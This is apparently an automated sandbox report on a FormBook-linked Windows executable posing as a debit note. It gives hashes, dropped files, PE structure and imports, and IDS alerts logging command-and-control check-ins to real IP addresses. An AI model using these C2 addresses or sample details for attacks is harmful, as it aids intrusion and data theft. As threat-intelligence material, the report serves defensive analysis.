	Se adjuntan los documentos de env#U00edo originales DHL.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2

Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\overroughly

Download File

Process:	C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.995872281780949
Encrypted:	true
SSDEEP:	6144:1rnDGXRdnSvtI416luDNZwLg6cY7W/mNR1qo+Xg/hf7:1bgdnS110uD7hoW+V7Wg/5
MD5:	3EC70EAEEE12F47AB0D61BF6050FF279
SHA1:	A69C151FFD40CDE8F7012C1CFDEE17607E236D30
SHA-256:	8B3FDF5583F39B7B99AB08C0067759D59E64779A86C1520BB3DF94E3C4F68258
SHA-512:	6FD25147116CA251B86351F68B4C286FA39E8E059162642521C50B92264999B92DD6A1816E2B6817483C3EC2236EEA8C9C0A2A09A1DC7F3D97E6C671C3914C6B
Malicious:	false
Reputation:	low
Preview:	.jqg.E5AR...A.....0O..eZ?...045HE5ARKG6H6IVQ1P0LRAXMY7T5J0.5HE;^.EG.A.h.P}...:(+m)E;R8QY.+$[/=?gT-.;#?.9^l...m4X0Pd=9?lE5ARKG617@.lQ7.q2&.p9P./...(".[...(Q.L....,5..$:_iU-.45HE5ARK.sH6.WP1....AXMY7T5J.47IN4JRK.2H6IVQ1P0L.RXMY'T5JP05HEuAR[G6H4IVW1P0LRAXKY7T5J045(A5APKG6H6ITQq.0LBAX]Y7T5Z04%HE5ARKW6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY. P2D45HazERKW6H6.RQ1@0LRAXMY7T5J045hE5!RKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6IVQ1P0LRAXMY7T5J045HE5ARKG6H6

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.428379052156488
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
File size:	1'627'136 bytes
MD5:	a60ae01b598fd87cbc1ed78936ded2e6
SHA1:	3a9bb16caa197dde7190a1bd9b2ac86713ab09a2
SHA256:	a9b71509abbfcf9ed2120614204bd47ab10bd54cd7b0b2a4b89eed3b559a0fae
SHA512:	df4986d59c0c71cbcc55f4f25736d5be656dd12d7e2cf8770076555861732cfbe94c42dff9b447e78338ed8ff3778a0b1cfcd902768e3a23e7bfdaafc29dada6
SSDEEP:	24576:gqDEvCTbMWu7rQYlBQcBiT6rprG8adYyZ7wLMXlZq19WaelgTVmveY+D+Kifyi:gTvC/MTQYxsWR7adN+Tag8veEf
TLSH:	C075E1027391C022FF9BA2334B56F6115BBC7A660123E62F13981D79BE705B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672413EA [Thu Oct 31 23:34:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FED893C3333h
jmp 00007FED893C2C3Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FED893C2E1Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FED893C2DEAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FED893C59DDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FED893C5A28h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FED893C5A11h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xb687c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18b000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xb687c	0xb6a00	56d32e9f0e0291860d4566e5f497be81	False	0.9649747604380561	data	7.965956412705366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18b000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xd9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xda148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xda6dc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc410	0xadf12	data			1.000317208119405
RT_GROUP_ICON	0x18a324	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x18a39c	0x14	data	English	Great Britain	1.15
RT_VERSION	0x18a3b0	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x18a48c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-04T10:10:15.841217+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49730	TCP
2024-11-04T10:10:51.878537+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49736	195.154.200.15	80	TCP
2024-11-04T10:10:51.878537+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49736	195.154.200.15	80	TCP
2024-11-04T10:10:55.709492+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49737	TCP
2024-11-04T10:11:07.738394+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49789	199.59.243.227	80	TCP
2024-11-04T10:11:07.738394+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.4	49789	199.59.243.227	80	TCP
2024-11-04T10:11:10.289723+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49805	199.59.243.227	80	TCP
2024-11-04T10:11:12.913203+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49820	199.59.243.227	80	TCP
2024-11-04T10:11:15.422529+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49836	199.59.243.227	80	TCP
2024-11-04T10:11:15.422529+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49836	199.59.243.227	80	TCP
2024-11-04T10:11:21.224442+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49870	162.0.215.244	80	TCP
2024-11-04T10:11:23.749539+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49884	162.0.215.244	80	TCP
2024-11-04T10:11:26.346988+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49900	162.0.215.244	80	TCP
2024-11-04T10:11:28.863331+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49912	162.0.215.244	80	TCP
2024-11-04T10:11:28.863331+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49912	162.0.215.244	80	TCP
2024-11-04T10:11:35.035209+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49940	104.21.3.144	80	TCP
2024-11-04T10:11:37.604280+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49953	104.21.3.144	80	TCP
2024-11-04T10:11:40.092181+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49965	104.21.3.144	80	TCP
2024-11-04T10:11:42.714914+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49978	104.21.3.144	80	TCP
2024-11-04T10:11:42.714914+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49978	104.21.3.144	80	TCP
2024-11-04T10:11:49.292599+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50008	76.223.67.189	80	TCP
2024-11-04T10:11:50.971334+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50016	76.223.67.189	80	TCP
2024-11-04T10:11:54.574030+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50017	76.223.67.189	80	TCP
2024-11-04T10:11:56.260992+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50018	76.223.67.189	80	TCP
2024-11-04T10:11:56.260992+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50018	76.223.67.189	80	TCP
2024-11-04T10:12:02.827581+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	3.33.130.190	80	TCP
2024-11-04T10:12:05.370921+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	3.33.130.190	80	TCP
2024-11-04T10:12:07.920945+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	3.33.130.190	80	TCP
2024-11-04T10:12:10.521608+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50022	3.33.130.190	80	TCP
2024-11-04T10:12:10.521608+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50022	3.33.130.190	80	TCP
2024-11-04T10:12:16.425876+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50023	84.32.84.32	80	TCP
2024-11-04T10:12:18.969660+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	84.32.84.32	80	TCP
2024-11-04T10:12:21.498423+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	84.32.84.32	80	TCP
2024-11-04T10:12:24.065523+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50026	84.32.84.32	80	TCP
2024-11-04T10:12:24.065523+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50026	84.32.84.32	80	TCP
2024-11-04T10:12:29.975186+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50027	162.0.231.203	80	TCP
2024-11-04T10:12:33.277137+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	162.0.231.203	80	TCP
2024-11-04T10:12:35.032477+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	162.0.231.203	80	TCP
2024-11-04T10:12:37.587933+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50030	162.0.231.203	80	TCP
2024-11-04T10:12:37.587933+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50030	162.0.231.203	80	TCP
2024-11-04T10:12:43.965166+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50031	150.95.254.16	80	TCP
2024-11-04T10:12:46.548134+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	150.95.254.16	80	TCP
2024-11-04T10:12:49.047483+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	150.95.254.16	80	TCP
2024-11-04T10:12:51.585839+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50034	150.95.254.16	80	TCP
2024-11-04T10:12:51.585839+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50034	150.95.254.16	80	TCP
2024-11-04T10:12:58.308368+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50035	3.33.130.190	80	TCP
